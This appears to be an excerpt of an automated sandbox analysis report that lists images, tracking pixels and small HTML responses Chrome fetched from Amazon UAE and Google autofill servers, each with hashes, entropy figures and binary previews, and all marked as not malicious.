                                                                                                                                                                                                        SHA-512:91EF428F678B211169C99DF8FB2454F37993537587FDCABC1C6A2433B4C4394FD94D4BA425F9D6F1FC97E67F83234331C1228502BA09E34729337C2EB6FFB0D4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!.1."AQ..q23Bab...#R...S.................................................1..!"Aa............?....(..(..(..y...@k...y.E.`w.E......K..[T.... ..H.e.....i.{..?............F......z.".l.t.{w.O..y..JH.u..................5....Ksr.8...........Y.Jt.\..O#l.#..r..$j....TO.u.uk.&......~K.q.;"...5..<x|......].\.w.y....F..'[.a/)...................l~..E.ku*f5$A.y....vf?N{.B.Oe.......Y.....c.8...k|jwVV.V...j......d..tl..............m.......4....s..+.......{5X/..lz...o....."^........}....].........uu.X.8l..#.}.W.....{.8.5..V....P...Y..L...f..5.%)J.)J.)J.)J.EV/..Eo.....,!.....>.?......xi.f.8y...H. {.!.z.U.G.V.u..YL.-...x].....B3R#..k.E..L...Q@ER....*..l.y.;.w/.I!.6`......9..GP].....p..=...#?..7.k\..5....]I0.(`b.pe..fX.}.M....N.+....4.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14535
                                                                                                                                                                                                        Entropy (8bit):7.879436571334247
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:yJTbBqd41qycOfMACm+Ndq2f5zog1yPCsVasjCCML8OwKQ+:yJTbV17cO+84eNwsjCdLo+
                                                                                                                                                                                                        MD5:CB57C5063D4D6A58113CA014E0CD4A68
                                                                                                                                                                                                        SHA1:28057B6E3C95708FE4C43D83CC0EF15473E3A8A4
                                                                                                                                                                                                        SHA-256:A81C85E7996BC6D75C2535B24B65C9E667FA538A6E426BD8B0CC5AB833F1188F
                                                                                                                                                                                                        SHA-512:ABF7A687B5C7D47C0979BFADEC367F49E63F18BCB0032B264AF1249F2916D7FEFA837AAD5E7DA6FB1DA5AA9DC699DBDB311DA5785004A809002A3A8F1D1B013A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a2.2..........]...........:....................................{............}..............u..........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.14ecb42f2c, 2023/01/13-12:25:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b5fda8ec-2814-4cb6-8f13-b3de686f05db" xmpMM:DocumentID="xmp.did:384E825BB64F11EDAC9EB44161D1C413" xmpMM:InstanceID="xmp.iid:384E825AB64F11EDAC9EB44161D1C413" xmp:CreatorTool="Adobe Photoshop 24.2 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:b5fda8ec-2814-4cb6-8f13-b3de686f05db" stRef:documentID="xmp.did:b5fda8ec-2814-4cb6-8f13-b3de686f05db"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5074
                                                                                                                                                                                                        Entropy (8bit):7.80698522057377
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:ThsZ53rbliBg7MukUJnMHlDkx/AhrhyH3JZZBVo+uYG83Dl+amddXM8x:Kj7xMuYioY5BVXG8UXXdx
                                                                                                                                                                                                        MD5:4FFA6D5B2C6C67790DBF4DB7801EA8CE
                                                                                                                                                                                                        SHA1:01F4F4C616ED03B2DE69253984CEEF9FC2C9508D
                                                                                                                                                                                                        SHA-256:FEEDA695E09744F58007B043146FC8AC339FC4485008B421E83D14DA0DE50076
                                                                                                                                                                                                        SHA-512:D4E34F49D3434C7CA5B1C311E7256446336D58DB5A74F89EAF55C2F01C690911453242ADEEC503A0CB16E1698358357DFB1B5614C824E5BD4E9637988AF696D9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.............................................................................................:...r..k.'..9..'.NmY..|.k....s.[tS..U..4....@....X..j..U.[.........6L..I.*.....c.{1....._..~..[z9....w........y..|........{}..R.A:SL2.....C5.S..P[.6.S..r.W......s..M..P....=..5..u].......F)...../.......<H.{.E..y.C..o8.3......+...M@...byf.Y.U[.m...9.%[.u.a....../8z'z.?..o.(...2.W...77zE...........U.5...[h..B....._.Xo...Xkar..m...[0.../..>.!.L..$..I:\0.......X........y4Wsi.1.X..oT.*.t.]j...M].%..>....e._.lQ.Nk...........U..j:/j*[I..W......A.t.h..s.1..s5.....e.0&..Q.4..[...t8A0..............|.=.2...o.....Q.4.k ....r.,.L.*..r...W5zU......./.!.y.h.H.7.h.....o......o.....Nl.........................?...-..........................14...!02."A.#35pD............... ....Q.n%...W7..!\.+..sp.n......Zuf.7H,..[
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1000
                                                                                                                                                                                                        Entropy (8bit):7.724860875898492
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:27/6CDzOEYjE9Jbsu1RI29ULP0HEeUKT9CDNFkLGETC3:27/6ezYS1RI/teUKT8DyK
                                                                                                                                                                                                        MD5:2C6A95FD2D67DF42D3AD5B33331A9D03
                                                                                                                                                                                                        SHA1:4278519E27AB255FAF978401FD13DE414A918C2D
                                                                                                                                                                                                        SHA-256:FC87BA436C7378A076089E3942C37CBFC4CCDBC6383BA1DABC28971487C1C6F9
                                                                                                                                                                                                        SHA-512:A4C1E249F2B7DCDE4110AE0B0567A9426FF7DFCDC39CC07BFA98A7F47B19AE604E2ECD231365011FBE28A32496F7F6A0D1F34920595C8905C5488E46FF925F2E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/JT89MwO$JunoYts.png
                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....szz.....pHYs.................sRGB.........gAMA......a....}IDATx..W.O.A..3..!.......A...$&z....r.D.oz....../R.....b.E....p..@?8t9..5.@.c.......vk..;m.}.......Kd2...e.m..."$.4..'....{..2>mf.e-.om. ....e.....f3.....LX..]..f....*.<..5..../.P.{.5*..@.<._.Xj...,....(.A.j...S....6.....V.l5x..j:.r;9.......3...P...rl.Yp99.....r..+&....5e..*.a..y.~....Vv........a..m....I.J.e+..Z:=Q..b.^.P .(.."O.KM........1.........F:..P../^..6..n.X..V....<.*.m.c.NN..../4x.....g..2.w.i..;..`K...........U.^.^U?.|~.jD*..r&...<.q.{..b.........a..gz8c......~X..2...h2...P7..+...1.!...~...........Ca.x.N.x...0..........5..&\.Y..P/0&.k..i...?..*.Z.....i...OL...=..Z......n.W.<.3cb.d..&,......z...oI..b#(.......*..b..T/..#X,.g....Q.Q .S..G..f5....E.t];e...tn.D......4.E%=.$.[6.+c U;.e"..i...d..WP.......{w..p.T!..yQ.(..8..l...eO].d........I.K)^.0..J.*/...%...M5........Uj...D+:..{..a..w%UU1.........G8*.H......Z......X...1~.~o.....O....IEND.B`.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/rd/uedata?ld&v=0.295223.0&id=0RPFFN4XC9JAK0QN8ZQ4&ic=2&sw=1280&sh=1024&vw=1280&vh=907&m=1&sc=0RPFFN4XC9JAK0QN8ZQ4&ue=5&bb=58&be=358&fp=418&fcp=418&pc=2627&tc=-517&na_=-517&ul_=-1723729116529&_ul=-1723729116529&rd_=-1723729116529&_rd=-1723729116529&fe_=-513&lk_=-467&_lk=-467&co_=-467&_co=-388&sc_=-467&rq_=-388&rs_=-46&_rs=408&dl_=-39&di_=418&de_=418&_de=425&_dc=2626&ld_=2627&_ld=-1723729116529&ntd=-1&ty=0&rc=0&hob=4&hoe=5&ld=2628&t=1723729119157&ctb=1&rt=__ld:12-10-2-0-2-4-1&csmtags=aui|aui:aui_build_date:3.24.6-2024-08-09|mutObsYes|aui:css:cache|aui:js:cache|mutObsActive|fls-eu-amazon-ae|adblk_no|perfYes|fy_cdn_fr|fy_cdn_mp|FWCIMEnabled|csm-feature-touch-enabled:false&viz=visible:5&pty=FullPageAuthentication&spty=claim&pti=undefined&tid=0RPFFN4XC9JAK0QN8ZQ4&aftb=1&lob=1
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/rd/uedata?at&v=0.295223.0&id=0RPFFN4XC9JAK0QN8ZQ4&ctb=1&ic=2&m=1&sc=0RPFFN4XC9JAK0QN8ZQ4&pc=4237&at=4237&t=1723729120766&pty=FullPageAuthentication&spty=claim&pti=undefined&tid=0RPFFN4XC9JAK0QN8ZQ4&aftb=1&ui=2&lob=1
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):52
                                                                                                                                                                                                        Entropy (8bit):4.724880949810312
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:fnwPipSQG3+TsfMS1CYYn:4PE86sxC
                                                                                                                                                                                                        MD5:FAA34C1E7CD364B2520BDC1680268F15
                                                                                                                                                                                                        SHA1:CC85719B8AC55DD1D59425D9D1C0647720F3FB15
                                                                                                                                                                                                        SHA-256:4F5C78EA01D1CE7BC9E813BBD03202AF30D16E7C29C61F1B4A6302DAA85C7022
                                                                                                                                                                                                        SHA-512:5F7BDDB07225B4015A5837F4D7BB594354F08D7B515428E14C5B4B93DF140801A97FA2E70E84596AA1A2E9BF533259DD1848D64C16F9EFF76DE82162D25971BB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgkk_9ZjkP9InhIFDVSQfAsSBQ2DqFs9EgUNzkFMeg==?alt=proto
                                                                                                                                                                                                        Preview:CiMKBw1UkHwLGgAKCw2DqFs9GgQIVhgCCgsNzkFMehoECEsYAg==
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 166x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8400
                                                                                                                                                                                                        Entropy (8bit):7.9486007861616645
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:gRNBD9lK4NJ/XVM44lCkRViLp/ZFIQUvrgLTiyk:QBO4RM44l9X6hZmUXiyk
                                                                                                                                                                                                        MD5:58F0319D9F2025BA4F0003FC93B1C5C7
                                                                                                                                                                                                        SHA1:9A63CB7711F1DE10064F4AFE6399B2A6DC9C1667
                                                                                                                                                                                                        SHA-256:C41226B85ED60E92418800485D900D69BA7326A2F8665B9F7397FC35E90A9A6F
                                                                                                                                                                                                        SHA-512:25DA3C1AB169A7483B7C20B24FCB4CE528A001D5AB5B7854AE7BBA31552189BCFCFFAD3140A51D243387DC283803670365FE31921AB8A9052DA4710BDD6752D0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..................................................................!1."2U....#$36AQRSqu......BCb....ac..Ts..47Dr..Et....................................................!1R...#23AQq."Ba................?.......OP.._M.6.3E.0.....P.n.........J..2zU._{...a{.^.T....7.+....Q.....d..3E.&....J..2zT~zf..u..=*..@I.=3~R..L......)]~&OJ.4P.o.L....'.G.o.W_...:.@gu.!..\.%.......4..._Q..=..Y!.R.<.....P.W.o.W_.....7.+....W[\.....A.n.v.......T..S>.....W...7.d........J..2zT~zf..u..=*G..,.....lO`.&........5.....Y[.n.....m....J5.Z.G]C...gI..I.y.N...v.-..........Y.$1.)..N.).!..y~/....5.&.|./....!.e...N....o..VJ...m.........-..{....TA..>r....m.y..l...m..zI.,......1q.@.ZV.V....`...{.nG.t..flqiB...=q.?.B.. ......Q.r8M....]\<.Mp.;.R..H.%...vU`....^........,...O..l.%.{.5...[O..Y!wW_]I..J......R....R5.....7..G......7..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):59849
                                                                                                                                                                                                        Entropy (8bit):7.9719454048172675
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:AV/K8PMmwETLFFJn2vkNrgVmZIud0DSnZSe7+P:G/KQwETLdnW8rgVK0Dk8e7+P
                                                                                                                                                                                                        MD5:987E3DDAC3D34C5724954BEFFD75D52E
                                                                                                                                                                                                        SHA1:884F33C5CE2BE7E8B52CAC1311B89E138C378AE7
                                                                                                                                                                                                        SHA-256:9BA31014F9F97F405BCD46F9EA2CC124F7EEDDB7E0FE7AE579C37F5099C50D30
                                                                                                                                                                                                        SHA-512:973057698AF356A56D1BB6CE83797EF91FB76AB5E941014640058108BCFD269C0006A9866B2D0D7DEC7096531F2076135CEDC68D8D09B479E61C87AF29E2C5E8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986229_UAE_Budget_Store_AE_xsite_toys_en_400x400_2X._CB644457596_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................<..................................................................................X..0...@.WoQ.....q..g.>?uK.....}[...&.Y?0.....................X{.dX......yG.........^..r...BJ.C.s.:................Q."...s.I.w8..........3;.I.s............<~...!....^.............d.h.$.............:V?..v.ef .9..........e.....u...........2e....Y..}...........R...;'.r.M.@.........47.R?........q.-<#vQz_goA.S:.K."...B.hX...?....Z..3}y|.?y|...8K...@.....Y..-.a............~.G...ox.)Y.w.-........... |...}U...o.0...K)....#H....D./"!...........?....].sgF?./..........W........Pd...E.y.i>p..&,.S.uG`...#.Y.P.Yr..............B.b.-/.:.f...,p..')XVG.p..........F.....@....}..&H.M.@..:.4.+#Ps{..{........]}.....v.l.V.v9.F..O....}.k...........!...B..}.B....0.....Y..8.._ .......4...=.>.W`.>.6...2|..xd...}.&.e...y.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):7620
                                                                                                                                                                                                        Entropy (8bit):7.90492341379653
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:gQWbAlpz8WpQJYcTArsj+g92iR+LDQPJ1:pnz8WpQemHjd92iUu
                                                                                                                                                                                                        MD5:C869A4B0C9507B4A14DA4F13290C6987
                                                                                                                                                                                                        SHA1:0B6D7875E332B9F13FA457B117B27FDF88646C69
                                                                                                                                                                                                        SHA-256:FE3FD80964182C3B78CE779EEC8B9A280FC45D38E9473969E65795E29566E22F
                                                                                                                                                                                                        SHA-512:308D5CFC8616D9A69A62E0BC07B45A847D9EF7105A1CFAFA6AACD256027017D1DC7FDAF4EC39CFEC03D247B2B39C2CD81CD4D6B5D782B64600ABC05307FF9FD6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/41gRz4miKkL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................`....#.M.e........HJ....=..Z..2./...B...P..jW'..t.......yp.>kht3..vq!)......\.C.1... O......N...!Q...\..z.....Ph.N....|.MX-mZ...f....P.^.F.u.q.Q1TL.~..n#)(.......QG"...*3.dS..^.....o..R(.....jFYD.....~....4..........m..>....M9....-.%'g}..|.M.h.>t*]wIV,..1.F.Rt...........+.G..Y\!gp....F y.{.w8.......h...'O@......Q........\.L........w.}E........L<............<)..z5...........pG!...E.dM.W...9..7w.....X.i..R%.o.......<5..9..IG....y.|C....F.R...D..ek.n.e!.\....U.L....6...x....%B<.KL.B}...^.........Co&..%Y........ui....Q.L.j'^......Ys.......E....Y.....v....u..^q7\......:..h..l.....4TN....u.V........b.7.T..f<.s4E...1*B...!..N.. .h....8..2z..c.EKP...!......t..H..B3q.m.R..5n.G.6....9..;.gX...I...|U....Gze.R.&...O.I.x
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):28
                                                                                                                                                                                                        Entropy (8bit):4.066108939837481
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Q3S1lnyY:QC1lnL
                                                                                                                                                                                                        MD5:C2123D55130F2FA8031FE9BFFF36E675
                                                                                                                                                                                                        SHA1:B1F9FA4201BBA320891B92428E08EBDBE97F281A
                                                                                                                                                                                                        SHA-256:C456CA51EA843B4E09F6102F892EF409440A5C3C3615821B2586EEAD2F680506
                                                                                                                                                                                                        SHA-512:C962FF1CF2655106BE8456A80B945BFFE9EEFA29224684FA8B68FC8AA0364DADE034FBFF426BF48F8E2C0652F596EF47AFEE2129E40D995CB2B73F1109B13ED9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmsilr5PRTcwRIFDb1LTuESBQ1IOj9B?alt=proto
                                                                                                                                                                                                        Preview:ChIKBw29S07hGgAKBw1IOj9BGgA=
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 224x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6891
                                                                                                                                                                                                        Entropy (8bit):7.948079304124011
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Tuj5gLBMHWLwIJ7FVjo/yTOTSphS6DyrIdXYFxQZDPWF32EY3KpR9Aq47MikY/Pg:RLW6DJ7FKSOWpryr6WFm/336DSez3Kih
                                                                                                                                                                                                        MD5:61CD78ABCEEA9BADD1CBF93383890E89
                                                                                                                                                                                                        SHA1:8B262DA40AC0ECB2C398ADF185D019646F585AA3
                                                                                                                                                                                                        SHA-256:A8395389DE4F3772B0E58E7BC084B117FA1EC910F2265AAA1803739DF0A42547
                                                                                                                                                                                                        SHA-512:3573F304281E59B508E510271340254BB8DA78627C0F60E8E6F629971895D462FC88ABA9F6E7BFBB203E993CD351ABFF28443231B59AAA3112ED780C275B9D93
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/619pZrUnkWL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!..1..AQqs..."25ar.....#4BSctu........$D.&36RTb...%..Cd..................................................1."QR.23aqA...!#B............?..-r..9r..m.pM..q..2^..ygw..`s.l.....b......"p&.>L9....n.E..^.A.N..G..n......y.M.|...b..|.Yh`q".C.....=.X!.h#...g:...L..6.q........$Rr...5...DX....[....{7a..}...`~R..<.gR.i......Z.7v<Oc..tU.....3v*..`r.>..B.h...S.[iK(|..$..E@.iO.v....R:.....e4.../..P.F..b{..d.....Q..(.~....2...O.U\./..Sh.v..X.4.uv.-.&^...#.wa..?.........L..,....K..9v..{.2..4&......PzZ.Q'e...P.M..y.L|.G.*3.d.0.t....9.`....P..cn.0V.Z..(Pjw`.....t.......}.<....K.......P.Fwe..LF/^....b9c.`l....t[M.+..a.-.......r3g....4c...B...........'.j.ve#l...}..|..`.......V..k9[.3x..<el.1.^...EIT.?.,..P<.]n6......A.n..$..Ph)hD..l.......\.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D15079%26at%3D15079%26t%3D1723729109593%26csmtags%3DstartVL%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15079
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11090
                                                                                                                                                                                                        Entropy (8bit):7.957584117931631
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ZqRUHmufYO7VP8aiWAtsIpg3RfL2VMmKyNn8rCssu+Ho1Ro6mwy1ue7bDyN:MRUHmfsJ3Rj2VMmL8qhHo1Rq1Je
                                                                                                                                                                                                        MD5:66C745CF15FED7B8EF2E92714D1FA723
                                                                                                                                                                                                        SHA1:B119D9A0883EFA9EFF524C73C181687AF1352BC5
                                                                                                                                                                                                        SHA-256:B689171362BF225E07780A852BEC1E98540E238816734E4FED6132EE17963654
                                                                                                                                                                                                        SHA-512:3045EFB5F61FD36AEC5B1EA0A637BB123D13C5E7B084DED6CC82695C2A64A5ADF27E22181DEBF0B7F39DABF079AFB476B014AD9FB97D0B3831F9C1DE912240A7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
